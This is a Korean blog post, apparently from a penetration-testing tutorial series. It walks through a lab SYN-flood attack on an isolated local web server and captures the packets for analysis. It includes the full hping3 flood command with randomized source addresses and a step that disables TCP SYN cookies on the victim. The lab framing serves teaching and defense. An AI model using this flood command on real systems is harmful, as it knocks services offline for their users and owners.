실습> TCP SYNflooding (씬플러딩)
1. 패키지 설치
Victim2# yum -y install httpd python3
2. 웹서버 시작
Victim2# systemctl start httpd
3. 네트워크 단절
--reand-source 옵션을 사용하기 위해서 외부 네트워크를 사용하지 못하도록 설정한다.
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.108.2 0.0.0.0 UG 100 0 0 ens33
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
Victim2# route del default gw 192.168.108.2
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
4. syncookie 비활성화
/proc/sys/net/ipv4/tcp_syncookies : 0 비활성화
/proc/sys/net/ipv4/tcp_syncookies : 1 활성화
Victim2# echo 0 > /proc/sys/net/ipv4/tcp_syncookies
5. 모니터링
Victim2# vi netstatTest.py
-- netstatTest.py --
#!/usr/bin/env python3
import time
import os
sleepTime = 5 #
count = 1
cmd = ('clear', 'netstat -nat |grep -v LISTEN')
# 무한 루프
while True:
os.system(cmd[0]) # 화면 지우기
print(f"===> count : {count}, sleep time : {sleepTime} <===")
os.system(cmd[1]) # netstat 실행
count += 1 # 1증가
time.sleep(sleepTime) # 2초 sleep
-- netstatTest.py --
Victim2# chmod 755 netstatTest.py
Victim2# ./netstatTest.py
===> count : 41, sleep time : 5 <===
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 84 192.168.108.100:22 192.168.108.1:1339 ESTABLISHED
tcp 353 0 192.168.108.104:50716 192.168.108.102:4444 CLOSE_WAIT
6. 공격
hping3 옵션
-S : SYN
-c : count
-p : port
--flood : 최대한 빠르게 전송
--rand-source : 랜덤 소스
네트워크가 단절된 상태에서 테스트를 진행한다.
Attacker# hping3 -c 100000 -p 80 -S 192.168.108.100 --rand-source --flood
===> count : 6, sleep time : 5 <===
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.108.100:80 192.168.108.102:4406 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4451 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57628 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4390 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4259 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4353 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4189 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57615 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57614 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4174 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4542 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4368 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4386 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4462 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4279 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4193 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4359 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4284 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4190 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4289 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57618 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:4261 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57822 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57619 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57647 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8180 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7921 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7858 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:410 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8154 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7899 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7979 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8146 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7920 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57667 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63570 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8047 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7991 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63465 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7982 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7966 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7917 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8018 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8019 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7847 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7889 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7990 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7918 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63469 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8191 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63462 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8050 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63415 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8027 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63405 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8298 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7980 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8167 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57616 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8189 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8185 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:408 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8153 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8134 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63571 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:411 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8343 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8138 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8137 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8067 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:7986 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8176 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8196 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8038 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8016 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8122 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63463 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8258 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57650 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8121 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:63464 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8478 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8296 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57649 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8177 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8385 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8239 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57826 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8147 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:57617 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8236 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8083 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:409 SYN_RECV
tcp 0 0 192.168.108.100:80 192.168.108.102:8192 SYN_RECV
tcp 0 0 192.168.108.100:22 192.168.108.1:1339 ESTABLISHED
tcp 353 0 192.168.108.104:50716 192.168.108.102:4444 CLOSE_WAIT
^C
7. Gateway 활성화
Victim2# route add default gw 192.168.108.2 dev ens33
Victim2# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.108.2 0.0.0.0 UG 0 0 0 ens33
192.168.108.0 0.0.0.0 255.255.255.0 U 100 0 0 ens33
8. 패킷 덤프
패킷을 덤프 받고 파일로 저장한 후 분석한다.
ens33 인터페이스에서 오는 192.168.108.102 패킷을 tcpSynFlooding.pcap 파일로 저장한다.
Victim2# tcpdump -i ens33 -w tcpSynFlooding.pcap host 192.168.108.102
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
Attacker# time hping3 -c 100000 -p 80 -S 192.168.108.100 --flood
HPING 192.168.108.100 (eth0 192.168.108.100): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.108.100 hping statistic ---
1093365 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
real 0m15.133s
user 0m0.077s
sys 0m15.312s
tcpdump: listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
^C373588 packets captured
1246417 packets received by filter
872828 packets dropped by kernel
호스트 OS에서 덤프된 패킷을 다운로드 받아서 와이어샤크에서 분석한다.
http://192.168.108.100/tcpSynFlooding.pcap
'Linux > 모의해킹' 카테고리의 다른 글
| GateWay IP 주소 삭제 (0) | 2022.01.13 |
|---|---|
| 파이썬 코드를 활용한 tcpSynFlooding 공격 (0) | 2022.01.11 |
| LAND Attack (0) | 2022.01.11 |
| Ping Of Death (0) | 2022.01.11 |
| ICMP Redirect 활성화/비활성화 테스트 (0) | 2022.01.11 |